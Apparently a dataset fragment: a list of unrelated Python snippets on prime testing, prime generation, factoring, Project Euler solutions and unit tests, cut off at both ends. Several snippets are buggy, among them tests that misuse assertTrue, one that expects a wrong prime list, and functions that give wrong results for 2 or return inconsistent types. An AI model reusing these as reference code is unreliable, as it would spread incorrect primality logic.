n)\n if (x == 1) or (x == n - 1):\n return True\n\n for i in range(s - 1):\n x = pow(x, 2, n)\n if x == 1:\n return False\n elif x == n - 1:\n return True\n\n return False", "def test_primes_under_1000000(self):\n self.assertEqual(len(sieve(100)), 25)\n self.assertEqual(len(sieve(1000)), 168)\n self.assertEqual(len(sieve(10000)), 1229)\n self.assertEqual(len(sieve(100000)), 9592)\n self.assertEqual(len(sieve(1000000)), 78498)", "def gen_Primes(pp, K, Q, L):\r\n global MAX_PRIME\r\n global MAX_NUMBER\r\n global cnt_divisions\r\n global cnt_no_primes\r\n global cnt_compares\r\n global cnt_numbers\r\n global dict_P_runlen\r\n global dict_N_runlen\r\n # get the primes by testing the remainder\r\n # after division with formerly computed primes\r\n # stop when found square of prime greater current number\r\n cnt_divisions = 0\r\n cnt_no_primes = 0\r\n cnt_compares = 0\r\n cnt_numbers = 0\r\n X = gen_Numbers(0, L)\r\n # we already know some primes - skip them\r\n while True:\r\n x = next(X)\r\n if x >= pp: # also ignore pp - it's a square\r\n break # we are at the edge\r\n # now compare numbers revers against squares - think about roots\r\n # and test the remainder ...\r\n while True:\r\n x = next(X)\r\n if x > MAX_NUMBER:\r\n break\r\n cnt_numbers += 1\r\n prime_found = True # assume tha's a prime\r\n cnt_runlength = 0\r\n for p, q in zip(K, Q):\r\n cnt_compares += 1\r\n if q > x:\r\n # compare current x against the sqare of known primes\r\n # if gretaer than we need no more divisors from list\r\n break\r\n cnt_runlength += 1\r\n cnt_divisions += 1\r\n if x % p == 0:\r\n # primitive test for a prime\r\n prime_found = False # wrong assumptions - get next x\r\n cnt_no_primes += 1\r\n break\r\n else:\r\n prime_found = False\r\n assert False, \"PrimeDivisorError/SquareRuleError\"\r\n if prime_found:\r\n # ok - we found one - also store new values for future compares\r\n K.append(x)\r\n Q.append(x*x)\r\n dict_P_runlen[cnt_runlength] = dict_P_runlen.get(\r\n cnt_runlength, 0) + 1\r\n yield x\r\n else:\r\n dict_N_runlen[cnt_runlength] = dict_N_runlen.get(\r\n cnt_runlength, 0) + 1\r\n return", "def is_prime(n):\n\n if n in CONSTANTS.LOW_PRIMES:\n return True\n\n for prime in CONSTANTS.LOW_PRIMES:\n if n % prime == 0:\n return False\n\n if n == 2:\n return True\n if n % 2 == 0:\n return False\n s = 0\n d = n - 1\n while d % 2 == 0:\n d //= 2\n s += 1\n for _ in range(CONSTANTS.MILLER_RABIN_ITERATIONS):\n a = random.randint(2, n - 2)\n x = pow(a, d, n)\n if x == 1 or x == n - 1:\n continue\n for _ in range(s - 1):\n x = pow(x, 2, n)\n if x == n - 1:\n break\n else:\n return False\n return True", "def is_prime(n, k=10):\n if n == 2 or n == 3:\n return True\n if not n & 1 or n < 2:\n return False\n m = n - 1\n s = 1\n d = m >> 1\n while not d & 1:\n s += 1\n d >>= 1\n for i in range(k):\n a = randint(2, n - 2)\n x = expmod(a, d, n)\n if x == 1 or x == n - 1:\n continue\n for r in range(1, s):\n x = x * x % n\n if x == 1:\n return False\n if x == n - 1:\n break\n else:\n return False\n return True", "def test_prime_12(self):\n\t self.assertTrue(prime_generator(12), [2, 3, 5, 7, 11])", "def test_25(self):\n self.assertFalse(is_prime(25))", "def ll_primality(n: int) -> bool:\n if n <= 2 or not trial_div(n):\n return False\n luc_leh = lucas_lehmer()\n for _ in range(n - 1):\n ll = next(luc_leh)\n return ll % (2**n - 1) == 0", "def test_12():\n assert primes(12) == [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61]", "def test_15(self):\n\t self.assertTrue(prime_generator(15), [2, 3, 5, 7, 11, 13])", "def test_stress(self):\n primorial100 = 4711930799906184953162487834760260422020574773409675520188634839616415335845034221205289256705544681972439104097777157991804380284218315038719444943990492579030720635990538452312528339864352999310398481791730017201031090\n for i in range(10000):\n self.assertEqual(primorial(100), primorial100)", "def test_8(self):\n self.assertFalse(is_prime(8))", "def is_prime(n):\n assert n > 3\n k = int(log2(n))\n m = n - 1\n d = 0\n while(m % 2 == 0):\n m //= 2\n d += 1\n for _ in range(k):\n a = randint(2, n - 2)\n x = pow(a, m, n)\n if x == 1 or x == n - 1:\n continue\n for _ in range(d - 1):\n x = pow(x, 2, n)\n if x == 1:\n return 0\n if x == n - 1:\n break\n if x != n - 1:\n return 0\n return 1", "def test_prime_10(self):\n\t self.assertTrue(prime_generator(10), [2, 3, 5, 7])", "def miller_rabin(n, basis):\r\n # basis = generate_basis(b)\r\n if n == 2 or n == 3:\r\n return True\r\n\r\n if n % 2 == 0:\r\n return False\r\n\r\n r, s = 0, n - 1\r\n while s % 2 == 0:\r\n r += 1\r\n s //= 2\r\n for b in basis:\r\n x = pow(b, s, n)\r\n if x == 1 or x == n - 1:\r\n continue\r\n for _ in range(r - 1):\r\n x = pow(x, 2, n)\r\n if x == n - 1:\r\n break\r\n else:\r\n return False\r\n return True", "def is_prime(number, num_trials=200):\n if number < 2:\n return False\n if number != 2 and number % 2 == 0:\n return False\n\n # Find largest odd factor of n-1.\n exp = number - 1\n while exp % 2 == 0:\n exp //= 2\n\n for _ in range(num_trials):\n rand_val = int(random.SystemRandom().randrange(1, number))\n new_exp = exp\n power = pow(rand_val, new_exp, number)\n while new_exp != number - 1 and power != 1 and power != number - 1:\n power = (power * power) % number\n new_exp *= 2\n if power != number - 1 and new_exp % 2 == 0:\n return False\n\n return True", "def multiplicaciones(): #906609 tiene que darme\n ultimo_palindromo = 0\n total = 0\n for primer_numero in range(100, 1000):\n for segundo_numero in range(100, 1000):\n #total se encarga de hacer la multiplicacion entre los numeros\n total = primer_numero * segundo_numero\n # llamamos a la funcion que verifica si la multiplicacion que envia es un palindromo\n if obtener_palindromo(total):\n #luego de verificar que la multiplicacion era palindromo pasamos a evaluarla hasta llegar al ultimo palindromo\n #entre 100 y 1000\n if ultimo_palindromo < total:\n ultimo_palindromo = total\n return ultimo_palindromo", "def test_primes_under_10(self):\n self.assertEqual(sieve(10), [2, 3, 5, 7])\n self.assertEqual(sieve(100), [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31,\n 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97])", "def solution(n: int = 2000000) -> int:\n\n return sum(takewhile(lambda x: x < n, prime_generator()))", "def prjEuler():\r\n #Constants\r\n NUMSTRING = ( \"73167176531330624919225119674426574742355349194934\"\r\n \"96983520312774506326239578318016984801869478851843\"\r\n \"85861560789112949495459501737958331952853208805511\"\r\n \"12540698747158523863050715693290963295227443043557\"\r\n \"66896648950445244523161731856403098711121722383113\"\r\n \"62229893423380308135336276614282806444486645238749\"\r\n \"30358907296290491560440772390713810515859307960866\"\r\n \"70172427121883998797908792274921901699720888093776\"\r\n \"65727333001053367881220235421809751254540594752243\"\r\n \"52584907711670556013604839586446706324415722155397\"\r\n \"53697817977846174064955149290862569321978468622482\"\r\n \"83972241375657056057490261407972968652414535100474\"\r\n \"82166370484403199890008895243450658541227588666881\"\r\n \"16427171479924442928230863465674813919123162824586\"\r\n \"17866458359124566529476545682848912883142607690042\"\r\n \"24219022671055626321111109370544217506941658960408\"\r\n \"07198403850962455444362981230987879927244284909188\"\r\n \"84580156166097919133875499200524063689912560717606\"\r\n \"05886116467109405077541002256983155200055935729725\"\r\n \"71636269561882670428252483600823257530420752963450\" )\r\n \r\n #defined items\r\n greatest_prod = 1\r\n euler_queue = fiveQueue()\r\n \r\n #code\r\n for numIter in NUMSTRING:\r\n if( euler_queue.push( numIter ) ):\r\n temp_prod = euler_queue.product()\r\n if( temp_prod > greatest_prod ):\r\n greatest_prod = temp_prod\r\n \r\n print \"The greatest product is %d\" % greatest_prod\r\n return", "def isprime(n):\n if n < 2:\n return False\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n i = 5\n w = 2\n\n while i * i <= n:\n if n % i == 0:\n return False\n i += w\n w = 6 - w\n return True", "def is_prime(n):\n return mr_prime(n)", "def prmn(n, l=2,primesDict = primesDict):\r\n if len(primesDict) <= 1:\r\n primesDict[2] = 1\r\n primesDict[3] = 2\r\n u = n\r\n psrt = 2\r\n while len(primesDict) <= u:\r\n if l > psrt**2:\r\n psrt = (l**0.5)\r\n\r\n for i in primesDict:\r\n if i > psrt:\r\n\r\n # store the last_value_in_dict:current_prime_no\r\n primesDict[l] = len(primesDict)+1\r\n break\r\n if l % i == 0:\r\n break\r\n l += 1\r\n primesDict[3] = 2", "def testprimes():\n\n # for integers a number 'p' is a prime:\n # if it is NOT divisible by any number larger than one, and less or equal\n # than the squareroot of 'p'\n\n # for polynomials, i assume i can do something like:\n # if it is NOT divisible by any polynomial of -order- larger than one, and less or equal\n # than the half the order of 'p'\n print(\"----- polynomials -----\")\n for a in range(1,1024):\n print(\"%4d:\" % a, end=\"\")\n foundsqrt = False\n a = BinaryPolynomial(a)\n for b in range(2, a.bits):\n b = BinaryPolynomial(b)\n q,r = divmod(a,b)\n print(1 if bool(r) else 0, end=\"\")\n if not foundsqrt and b.order()*2>a.order():\n print(end=\"/\")\n foundsqrt = True\n print()\n\n print(\"----- normal integers -----\")\n for a in range(1,1024):\n print(\"%4d:\" % a, end=\"\")\n foundsqrt = False\n for b in range(2, a):\n q,r = divmod(a,b)\n print(1 if bool(r) else 0, end=\"\")\n if not foundsqrt and b*b>a:\n print(end=\"/\")\n foundsqrt = True\n print()", "def isprime(n):\n if n == 2: return True\n if n == 3: return True\n if n % 2 == 0: return False\n if n % 3 == 0: return False\n i = 5\n w = 2\n while i * i <= n:\n if n % i == 0:\n return False\n i += w\n w = 6 - w\n return True", "def start_prime_test():", "def isPrime(p):\n for sp in smallprimes:\n if p == sp:\n return True\n if p % sp == 0:\n return False\n n_tries = 50\n s, m = decompose(p-1)\n while (n_tries > 0):\n n_tries -= 1\n a = random.randrange(2, p-2)\n x = myExp(a,m,p)\n if x == 1 or x == p-1: ##probably prime\n continue\n prime_flag = False\n for _ in range(1, s):\n x = myExp(x, 2, p)\n if x == 1: ## p is not prime\n return False\n elif x == p-1:\n prime_flag = True\n break\n if not prime_flag:\n return False\n return True", "def prjEuler():\r\n a = 1\r\n for a in range( 1, 1000 ):\r\n for b in range( 1, 1000 ):\r\n if( ( sqrt( ( a ** 2 ) + ( b ** 2 ) ) % 1 ) == 0 ):\r\n if( ( a + b + ( sqrt( ( a ** 2 ) + ( b ** 2 ) ) ) ) == 1000 ):\r\n print \"The product is %d\" % ( a * b * ( sqrt( ( a ** 2 ) + ( b ** 2 ) ) ) )\r\n return\r\n \r\n return", "def isprime(n):\n if n == 1:\n return False\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n\n i = 5\n w = 2\n\n while i * i <= n:\n if n % i == 0:\n return False\n\n i += w\n w = 6 - w\n\n return True", "def test_is_prime_invalid(self):\n sol = solution.Solution();\n self.assertFalse(sol.isPrime(1))\n self.assertFalse(sol.isPrime(4))\n self.assertFalse(sol.isPrime(6))\n #self.assertFalse(sol.isPrime(864))", "def primenumbers(number, recurv, templist):\n for j in recurv:\n templist = [i for i in templist if i % j != 0]\n\n for x in templist:\n if not recurv:\n if number % x == 0:\n recurv.append(x)\n primenumbers(number, recurv, templist)\n if number % x == 0 and x > recurv[-1]:\n recurv.append(x)\n '''while tempnumber != 1 and tempnumber in recurv:\n if tempnumber % x == 0:\n tempnumber = number / x\n recurv.append(x)'''\n answer = functools.reduce(lambda x, y: x * y, recurv)\n print('answer:')\n print(answer)\n print(number)\n if answer == number:\n print('worked')\n break\n else:\n print('hi')\n primenumbers(number, recurv, templist)\n return recurv", "def isprime(n):\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n\n i = 5\n w = 2\n\n while i * i <= n:\n if n % i == 0:\n return False\n\n i += w\n w = 6 - w\n\n return True", "def premier(p: int) -> bool:\n if p < 2: return False\n k = 2\n while k**2 <= p:\n if p%k == 0:\n return False\n k+=1\n return True", "def getPrime(k = 50, verbose = True, extraOutput = False):\n\n # sanity check\n if k < 1:\n print(\"Number of bits in prime must be greater than 0\")\n return False # unsuccessful\n\n ############ START TIMER #########\n start = time.time() # start timing\n\n if extraOutput: # if we are in verose mode\n print(\"=\"*50,\n \"\\nGenerating \", k, \"bit prime... \")\n\n ############ GET ROUNDS OF Miller-Rabin #########\n r = getRounds(k)\n\n if extraOutput:\n print(r, \"rounds of Miller-Rabin needed (according to FISC)\")\n\n ############ GET PRIME LIST FOR TRIAL DIVISION #########\n # get prime list (only do it once for the lowest number k bits could be to speed up\n primeList = getListOfPrimes(k)\n\n if extraOutput:\n print(\"Trial-Division prime list generated, size: \", len(primeList))\n\n\n ############ GENERATE PROBABLE PRIME #########\n prime = False\n numCandidates = 0\n\n # loop till probable prime is found\n while not prime:\n numCandidates += 1 # increment candidate count\n\n candidate = getOddNumber(k) # get an odd number as next candidate\n\n if extraOutput:\n print(\"New candidate...\", candidate)\n\n prime = checks(candidate, primeList, r) # run checks\n\n\n ############ OUTPUT #########\n if verbose:\n print(\"Prime of \", k, \"bits found:\", candidate)\n print(\"Checked %d candidates in %.2f s\" % (numCandidates, time.time() - start))\n\n return candidate", "def test_with_10_prime_numbers(self):\n numbers = [3,5,7,11,13,17,19,23,29,31]\n for number in numbers:\n self.assertFalse(has_divisors(number, int(math.sqrt(number) // 1) + 1), \"Number {} is a prime number.\".format(number))", "def is_prime(n):\n if n <= 1:\n return False\n if n < 4:\n return True\n if n % 2 == 0:\n return False\n if n < 9:\n return True\n if n % 3 == 0:\n return False\n\n limit = int(math.floor(math.sqrt(n)))\n i = 5\n while i <= limit:\n if n % i == 0:\n return False\n if n % (i + 2) == 0:\n return False\n i += 6\n return True", "def palin_primes(n, m):\r\n if n == m:\r\n if is_palin(str(m)):\r\n if is_prime(m, i_unchanging):\r\n print(m)\r\n\r\n elif is_palin(str(n)):\r\n if is_prime(n, i_unchanging):\r\n print(str(n))\r\n palin_primes(n + 1, m)\r\n else:\r\n palin_primes(n + 1, m)\r\n else:\r\n palin_primes(n + 1, m)", "def getPrime(bits):\n\twhile(True) :\n\t\t# on continue a tirer des nombres tant que l'on n'a pas trouve de nombre premier\n\t\tp = getrandbits(bits)\n\t\tif(miller_rabin(p,100)) :\n\t\t\treturn p", "def test_is_prime_valid(self):\n sol = solution.Solution();\n self.assertTrue(sol.isPrime(2))\n self.assertTrue(sol.isPrime(3))\n self.assertTrue(sol.isPrime(7))\n #self.assertTrue(sol.isPrime(863))", "def rand_prime(k=10): \n i = random.randint(2**(k-2),2**(k-1))\n i,l=2*i+1,0\n while True:\n j = 3\n l +=1\n while i%j!=0:\n j += 1\n if i == j:\n return i\n #return i,len(bin(i)[2:]),l\n i += 2", "def Ballie_PSW_test(n, max_trivial_trials=100):\n for i in range(max_trivial_trials):\n if primes[i] == n:\n return True\n if n % primes[i] == 0:\n return False\n if primes[i] ** 2 >= n:\n return True\n if not fermat_strong_test(n, 2):\n return False\n if not lucas_selfridge_test(n):\n return False\n return True", "def test_13(self):\n self.assertTrue(is_prime(13))", "def is_prime(n):\n\n def mr(n, _known_primes=[2, 3], _precision_for_huge_n=16, ):\n\n def _try_composite(a, d, n, s):\n if pow(a, d, n) == 1:\n return False\n for i in range(s):\n if pow(a, 2**i * d, n) == n-1:\n return False\n return True # n is definitely composite\n\n if n in _known_primes:\n return True\n if n in (0, 1):\n return False\n if any((n % p) == 0 for p in _known_primes):\n return False\n d, s = n - 1, 0\n while not d % 2:\n d, s = d >> 1, s + 1\n\n # Returns exact according to http://primes.utm.edu/prove/prove2_3.html\n if n < 1373653:\n return not any(_try_composite(a, d, n, s) for a in (2, 3))\n if n < 25326001:\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5))\n if n < 118670087467:\n if n == 3215031751:\n return False\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7))\n if n < 2152302898747:\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11))\n if n < 3474749660383:\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11, 13))\n if n < 341550071728321:\n return not any(_try_composite(a, d, n, s) for a in (2, 3, 5, 7, 11, 13, 17))\n # otherwise\n return not any(_try_composite(a, d, n, s)\n for a in _known_primes[:_precision_for_huge_n])\n\n def trial_division(n):\n if n < 2:\n return False\n if n < 4:\n return True\n if n % 2 == 0 or n % 3 == 0:\n return False\n\n limit = int(math.sqrt(n))\n divisor = 5\n\n while divisor <= limit:\n if n % divisor == 0 or n % (divisor + 2) == 0:\n return False\n divisor += 6\n\n return True\n\n if 30000000 < n < 341550071728321:\n return mr(n)\n else:\n return trial_division(n)", "def good_prime(p):\n return p % 4 == 3 and probablyPrime(p, accuracy=100)", "def isprime(n):\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n\n i = 5\n w = 2\n\n while i ** 2 <= n:\n if n % i == 0:\n return False\n\n i += w\n w = 6 - w\n\n return True", "def problem2(m, p):\n total = 0\n for k in range(m, m ** p):\n if is_prime(k):\n total = total + sum_of_digits(k)\n return total", "def isPrime(n):\n if n == 1:\n return False\n elif n < 4:\n return True\n elif n % 2 == 0:\n return False\n elif n < 9:\n return True\n elif n % 3 == 0:\n return False\n else:\n r = int(floor(sqrt(n)))\n f = 5\n while f <= r:\n if n % f == 0: return False\n if n % (f+2) == 0: return False\n f += 6\n return True", "def factorPR(n):\r\n\tfor slow in [2,3,4,6]:\r\n\t\tnumsteps=2*math.floor(math.sqrt(math.sqrt(n))); fast=slow; i=1\r\n\t\twhile i<numsteps:\r\n\t\t\tslow = (slow*slow + 1) % n\r\n\t\t\ti = i + 1\r\n\t\t\tfast = (fast*fast + 1) % n\r\n\t\t\tfast = (fast*fast + 1) % n\r\n\t\t\tg = gcd(fast-slow,n)\r\n\t\t\tif (g != 1):\r\n\t\t\t\tif (g == n):\r\n\t\t\t\t\tbreak\r\n\t\t\t\telse:\r\n\t\t\t\t\treturn g\r\n\treturn 1", "def prime_test(n,p):\n for i in range(2, p):\n thing = 1\n while thing == 1:\n if n % i == 0:\n n = n/i\n else:\n thing = 0\n if n == 1:\n return False\n return True", "def isPrime(n):\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n i = 5\n w = 2\n while i * i <= n:\n if n % i == 0:\n return False\n i += w\n w = 6 - w\n\n return True", "def gen_prime():\n\n n = 100\n if n == 2:\n return [2]\n elif n < 2:\n return []\n s = range(3, n + 1, 2)\n mroot = n ** 0.5\n half = (n + 1) / 2 - 1\n i = 0\n m = 3\n while m <= mroot:\n if s[i]:\n j = (m * m - 3) / 2\n s[j] = 0\n while j < half:\n s[j] = 0\n j += m\n i = i + 1\n m = 2 * i + 3\n primes = [2] + [x for x in s if x]\n return (primes[random.randint(1, len(primes) - 1)])", "def test_if_it_outputs_correct_output(self):\n self.assertEquals(prime_numbers(5), [2, 3, 5])", "def is_prime(n, number_of_tests=5):\n passes = 0\n prime = True #assume prime\n for i in xrange(number_of_tests):\n passes += 1\n random_int = random.randint(2, n-1)\n test = pow(random_int, n-1, n)\n if test != 1:\n prime = False\n break\n if prime:\n return 0\n else:\n return passes", "def test_if_it_outputs_correct_output_for_numbers_greater_than_50(self):\n self.assertEquals(len(prime_numbers(55)), 16)", "def isPrime(n): \n if n == 2 or n == 3: return True\n if n < 2 or n%2 == 0: return False\n if n < 9: return True\n if n%3 == 0: return False\n r = int(n**0.5)\n f = 5\n #Loop seeks out next prime factor and returns it\n while f <= r:\n if n%f == 0: return (False, f)\n if n%(f+2) == 0: return (False, (f+2))\n f +=6\n return True", "def is_prime(n):\n if n == 2 or n == 3: return True\n if n < 2 or n % 2 == 0: return False\n if n < 9: return True\n if n % 3 == 0: return False\n r = int(sqrt(n))\n f = 5\n while f <= r:\n if n % f == 0: return False\n if n % (f + 2) == 0: return False\n f += 6\n return True", "def test_handcrafted_examples(self):\n for i in range(1000):\n self.assertEqual(perfectd(0), True)\n self.assertEqual(prime(0), False)\n self.assertEqual(prime(2), True)\n self.assertEqual(prime(7), True)\n self.assertEqual(prime(15), False)\n self.assertEqual(perfectd(6), True)\n self.assertEqual(perfectd(15), False)", "def is_prime(n, k):\n if n <= 1 or n == 4:\n return False\n if n <= 3:\n return True\n if is_even(n):\n return False\n while k > 0:\n\n # Take random int in [2, n-2]\n a = random.randint(2, n-1)\n\n # Check if a and n are co-prime.\n if gcd(n, a) != 1:\n return False\n\n # Fermat's little theorem\n if modpow(a, n-1, n) != 1:\n return False\n\n k -= 1\n\n return True", "def radicale(n):\n r = 1\n for p in primi(n+1):\n if p>n:\n break\n if n%p==0:\n r *= p\n n = n//p\n return r", "def aks( n ):\n\n def aks_mod( polynomial , r ):\n \"\"\"\n This function is used in aks.\n polynomial modulo ( x^r - 1 )\n \"\"\"\n aks_mod = polynomial.coefficients\n total = aks_mod[ : r ]\n aks_mod = aks_mod[ r : ]\n while len(aks_mod) - 1 >= r :\n for i in range(r):\n total[i] += aks_mod[i]\n aks_mod = aks_mod[ r : ]\n for i in range(len(aks_mod)):\n total[i] += aks_mod[i]\n return array_poly_mod( total , polynomial.mod )\n\n lg = math.log( n , 2 )\n k = int( lg * lg )\n\n if arith1.powerDetection( n )[ 1 ] != 1: #Power Detection\n print(\" n is not prime \")\n return False\n\n start = 3\n while 1:\n d = arith1.gcd.gcd( start , n )\n if 1 < d < n:\n print(\"n is not prime\")\n return False\n x = n % start\n N = x\n for i in range( 1 , k + 1 ):\n if N == 1:\n break\n N = ( N * x ) % start\n if i == k:\n r = start\n break\n start += 1\n d = arith1.gcd.gcd( r , n )\n if 1 < d < n:\n print(\" n is not prime \")\n return False\n if n <= r:\n print(\" n is prime \")\n return True\n\n e = multiplicative.euler( r ) #Cyclotomic Conguence\n e = math.sqrt( e )\n e = int( e * lg )\n for b in range( 1 , e+1 ):\n f = array_poly_mod( [ b , 1 ] , n )\n total = array_poly_mod( [ 1 ] , n )\n count = n\n while count > 0:\n if count & 1:\n total = total * f\n total = aks_mod( total , r )\n f = f.power()\n f = aks_mod( f , r )\n count = count >> 1\n total_poly = total.coefficients_to_dict()\n if total_poly != { 0 : b , n % r : 1 }:\n print(\" n is not prime \")\n return False\n print(\" n is prime \")\n return True", "def isPrime(n):\r\n if n == 2:\r\n return True\r\n if n == 3:\r\n return True\r\n if n % 2 == 0:\r\n return False\r\n if n % 3 == 0:\r\n return False\r\n\r\n i = 5\r\n w = 2\r\n\r\n while i * i <= n:\r\n if n % i == 0:\r\n return False\r\n\r\n i += w\r\n w = 6 - w\r\n\r\n return True", "def _check_is_prime(possible_prime: int, test_rounds: int = 40) -> bool:\n\n # 2^s * d = n - 1\n d = possible_prime - 1\n s = 0\n while (d & 1) == 0: # d is even\n s += 1\n d >>= 1 # division by 2 of even number\n\n for i in range(test_rounds):\n if not _miller_rabin_test(possible_prime, d):\n return False\n\n return True", "def isprime(n=936):\n if n < 3: return False\n for i in range(2, n):\n if n % i == 0:\n return False\n return True", "def is_prime(n):\n if n <= 1: return False\n if n <= 3: return True\n\n if (n % 2 == 0 or n % 3 == 0):\n return False\n\n i = 5\n while i * i <= n:\n if n % i == 0 or n % (i + 2) == 0:\n return False\n i += 6\n return True", "def test_prime_2(self):\n\t self.assertTrue(prime_generator(2), [2])", "def prma(u:int, l:int=2,primesDict:dict = primesDict)->None:\r\n if len(primesDict) <= 1:\r\n primesDict[2] = 1\r\n primesDict[3] = 2\r\n \r\n psrt = 2\r\n while l <= u: # while the number (l) is less than(or equal to ) the given\r\n \r\n if l > psrt**2: # if l exceeds the previous val of psrt\r\n\r\n psrt = (l**0.5) # psrt = sqrt(l)\r\n\r\n for i in primesDict: #for the primes currently in primesDict\r\n\r\n if i > psrt: # You need to only check till the sqrt(l) to see if it is a prime..\r\n primesDict[l] = len(primesDict)+1 #if it exceeds the value then it must be prime..\r\n break\r\n\r\n if l % i == 0: # if it is divisible.. it jumps to the next number for l i.e: l++\r\n break\r\n l += 1", "def test_5(self):\n self.assertTrue(is_prime(5))", "def isPrime(n, primes):\n\n k = math.log(n, 2) # number of bits in n\n r = getRounds(k)\n\n return checks(n, primes, r) # run checks", "def test_with_10_not_prime_numbers(self):\n numbers = [4,8,10,15,20,155,270,300,444,985]\n for number in numbers:\n self.assertTrue(has_divisors(number, int(math.sqrt(number) // 1) + 1), \"Number {} is not a prime number.\".format(number))", "def prime(n):\n if n < 2:\n return False\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n\n i = 5\n w = 2\n\n while i * i <= n:\n if n % i == 0:\n return False\n\n i += w\n w = 6 - w\n\n return True", "def generate_large_prime(bit_size=1024):\n while True:\n p = random.randint(2**(bit_size-1), 2**bit_size)\n if is_prime(p):\n return p", "def isprime(n):\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n divisors[n] = n // 2\n return False\n if n % 3 == 0:\n divisors[n] = 3\n return False\n\n if n in primes:\n return primes[n]\n\n i = 5\n w = 2\n\n while i * i <= n:\n if n % i == 0:\n divisors[n] = n // i\n primes[n] = False\n return False\n i += w\n w = 6 - w\n\n primes[n] = True\n return True", "def isprime(n):\n if n % 2 == 0:return False\n return all(n % i for i in range(3, int(n**0.5) + 1, 2))", "def main() -> int:\n\n a = None\n for n, g in enumerate(gen_primes(100000, 1000000)):\n repeat, indices = check_if_has_3_repeated_digits(str(g))\n if repeat:\n a = check_for_family_of_primes(repeat, indices, list(str(g)))\n if len(a) > 7 and min(a) > 100000:\n EULER_LOGGER.debug(f\"{a}\")\n a = min([int(i) for i in a])\n break\n\n return a", "def test_5():\n assert primes(5) == [2, 3, 5, 7, 11]", "def is_prime(n):\r\n if n in (2, 3, 5, 7, 11, 13, 17, 19): return(True)\r\n if (n<=1 or n%2==0 or n%3==0): return(False)\r\n # determine upper limit of test range =>\r\n ulimit = (int(math.ceil(math.sqrt(n)))+1)\r\n return(not any(n%k==0 for k in range(3, ulimit, 2)))", "def maybe_prime(n: int, k: int = 3) -> bool:\n if n < 2:\n return False\n for p in small_primes:\n if n < p * p:\n return True\n if n % p == 0:\n return False\n r, s = 0, n - 1\n while s % 2 == 0:\n r += 1\n s //= 2\n for _ in range(k):\n a = randrange(2, n - 1)\n x = pow(a, s, n)\n if x == 1 or x == n - 1:\n continue\n for _ in range(r - 1):\n x = pow(x, 2, n)\n if x == n - 1:\n break\n else:\n return False\n return True", "def Pollard_rho_factor(n, check_prime=False):\n if check_prime and Miller_Rabin_test(n):\n return n\n\n if even(n):\n return 2\n\n while True:\n x0 = randint(2, n - 1)\n c = randint(1, n - 1)\n g = Pollard_rho_Floyd(n, x0, c)\n if g != n:\n return g", "def fermat_prime(n: int, k: int) -> int:\n assert n > 3 and k >= 1\n for _ in range(k):\n a = random.randint(2, n - 2)\n if pow(a, n - 1, n) != 1: # (a**(n-1)%n) != 1:\n return False\n return True", "def find_good_prime(num_bits=512):\n candidate = 1\n\n while not good_prime(candidate):\n candidate = random.getrandbits(num_bits)\n\n return candidate", "def isprime(n):\r\n\treturn is_prime(n)", "def solve(limit):\n upper_limit = ceil(sqrt(limit - 2**4 - 2**3))\n p_list = PrimeList(upper_limit)\n\n num_set = set()\n for x in p_list:\n val = limit - 2**4 - x**3\n if val < 0: continue\n lim = ceil(sqrt(val))\n for y in takewhile(lambda i: i<lim, p_list):\n val = limit - min(x,y)**4 - max(x,y)**3\n if val < 0: continue\n lim = ceil(sqrt(val))\n for z in takewhile(lambda i: i<lim, p_list):\n\n for a,b,c in permutations([x,y,z]):\n ans = a**2 + b**3 + c**4\n if ans > limit: continue\n num_set.add(ans)\n if a ==b and b == c: break\n\n return len(num_set)", "def is_prime(n):\n test_vals = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37]\n if n in test_vals:\n return True\n d = n - 1\n s = 0\n while not d & 1:\n d = d >> 1\n s += 1\n for a in test_vals:\n for r in range(0, s):\n if (a ** (d * (1 << r))) % n != (n - 1) \\\n and (a ** d) % n != 1:\n return False\n return True", "def basic_is_prime(_n):\n if _n < 2:\n return False\n for p in [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101,\n 103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199,\n 211, 223, 227, 229, 233, 239, 241, 251, 257, 263, 269, 271, 277, 281, 283, 293, 307, 311, 313, 317,\n 331, 337, 347, 349, 353, 359, 367, 373, 379, 383, 389, 397, 401, 409, 419, 421, 431, 433, 439, 443,\n 449, 457, 461, 463, 467, 479, 487, 491, 499, 503, 509, 521, 523, 541, 547, 557, 563, 569, 571, 577,\n 587, 593, 599, 601, 607, 613, 617, 619, 631, 641, 643, 647, 653, 659, 661, 673, 677, 683, 691, 701,\n 709, 719, 727, 733, 739, 743, 751, 757, 761, 769, 773, 787, 797, 809, 811, 821, 823, 827, 829, 839,\n 853, 857, 859, 863, 877, 881, 883, 887, 907, 911, 919, 929, 937, 941, 947, 953, 967, 971, 977, 983,\n 991, 997, 1009, 1013, 1019, 1021, 1031, 1033, 1039, 1049, 1051, 1061, 1063, 1069, 1087, 1091, 1093,\n 1097, 1103, 1109, 1117, 1123, 1129, 1151, 1153, 1163, 1171, 1181, 1187, 1193, 1201, 1213, 1217, 1223,\n 1229, 1231, 1237, 1249, 1259, 1277, 1279, 1283, 1289, 1291, 1297, 1301, 1303, 1307, 1319, 1321, 1327,\n 1361, 1367, 1373, 1381, 1399, 1409, 1423, 1427, 1429, 1433, 1439, 1447, 1451, 